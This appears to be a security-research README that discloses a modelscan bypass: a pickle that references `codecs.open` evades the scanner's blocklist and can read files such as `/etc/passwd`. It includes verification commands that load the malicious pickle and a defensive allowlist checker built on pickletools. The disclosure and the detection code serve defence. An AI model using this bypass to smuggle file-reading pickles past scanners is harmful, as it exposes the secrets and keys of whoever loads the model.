Add README
17e5002 verified
---
license: mit
tags:
- security-research
- modelscan-bypass
---
# modelscan-bypass-codecs-fileread
## Impact
HIGH: arbitrary file read (secrets, keys, config files)
## Technique
`codecs.open('/etc/passwd', 'r')`: the `codecs` module is not on modelscan's blocklist of dangerous imports, so a pickle that references it is not flagged.
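The gap above is structural: a blocklist of known-dangerous callables misses any module nobody thought to list. An allowlist check inverts the logic and rejects every import that is not expected for the model format. The following is an added example, not code from this repo or from modelscan; it walks a pickle's opcodes with the standard library's `pickletools` (so nothing is executed) and reports every `GLOBAL`/`STACK_GLOBAL` import whose module is not on an allowlist. `ALLOWED_MODULES` is a constructed placeholder, and the sample pickles are built inline; the suspicious sample only *references* `codecs.open` (no call is encoded), which is already enough for the check to reject it.

```python
# Added example (not part of this repo or of modelscan): allowlist-based
# static check of the imports a pickle would perform.
import codecs
import collections
import pickle
import pickletools

# Constructed placeholder: modules a model pickle for a given framework is
# expected to import. Anything else is reported, so an omission in a
# blocklist (such as `codecs`) cannot slip through.
ALLOWED_MODULES = {"collections", "numpy", "torch", "torch._utils"}

# Opcodes that push a string constant; STACK_GLOBAL consumes the last two.
STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}
# Opcodes that push nothing, so the "last pushed value" is unchanged.
NEUTRAL_OPS = {"PROTO", "FRAME"}


def pickle_imports(data: bytes) -> list[tuple[str, str]]:
    """Return the (module, name) pairs the pickle would import, without running it."""
    found = []
    strings = []   # string constants in push order
    memo = {}      # memo slot -> string value (None for non-string objects)
    last = None    # most recently pushed value, if it was a string
    for op, arg, _pos in pickletools.genops(data):
        if op.name in STRING_OPS:
            strings.append(arg)
            last = arg
        elif op.name == "GLOBAL":           # protocols 0-3: arg is "module name"
            module, name = arg.split(" ", 1)
            found.append((module, name))
            last = None
        elif op.name == "STACK_GLOBAL":     # protocols 4+: module and name were pushed
            if len(strings) < 2:
                raise ValueError("malformed pickle: STACK_GLOBAL without two strings")
            found.append((strings[-2], strings[-1]))
            last = None
        elif op.name == "MEMOIZE":          # unpickler stores at index len(memo)
            memo[len(memo)] = last
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if isinstance(last, str):       # a memoized module/name string reused
                strings.append(last)
        elif op.name not in NEUTRAL_OPS:
            last = None
    return found


def disallowed_imports(data: bytes, allowed=ALLOWED_MODULES) -> list[str]:
    """Dotted names of imports whose module is not on the allowlist."""
    return sorted({f"{m}.{n}" for m, n in pickle_imports(data) if m not in allowed})


# Constructed samples.
SAMPLE_PLAIN = pickle.dumps({"weights": [0.1, 0.2]})             # no imports at all
SAMPLE_ORDERED_DICT = pickle.dumps(collections.OrderedDict())     # allowed module
SAMPLE_CODECS_REF = pickle.dumps(codecs.open)                     # STACK_GLOBAL codecs.open
SAMPLE_CODECS_REF_P0 = pickle.dumps(codecs.open, protocol=0)      # GLOBAL codecs.open

if __name__ == "__main__":
    print(disallowed_imports(SAMPLE_PLAIN))         # []
    print(disallowed_imports(SAMPLE_ORDERED_DICT))  # []
    print(disallowed_imports(SAMPLE_CODECS_REF))    # ['codecs.open']
```

The check is deliberately coarse: it does not try to decide whether an import is "dangerous", only whether it is expected, which is what makes it robust to the blocklist omission this page describes. Pair it with loading models only from formats that carry no code (safetensors), or with `pickle.Unpickler.find_class` overridden to enforce the same allowlist at load time.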
## Verification
```bash
# Scan with modelscan - should show "No issues found"
modelscan scan -p model.pkl
# Execute to verify malicious behavior
python3 -c "import pickle; pickle.loads(open('model.pkl','rb').read())"
```
## Details
Modelscan bypass via `codecs.open`: arbitrary file read.
Tested against modelscan v0.7.6 (latest PyPI release at the time of writing).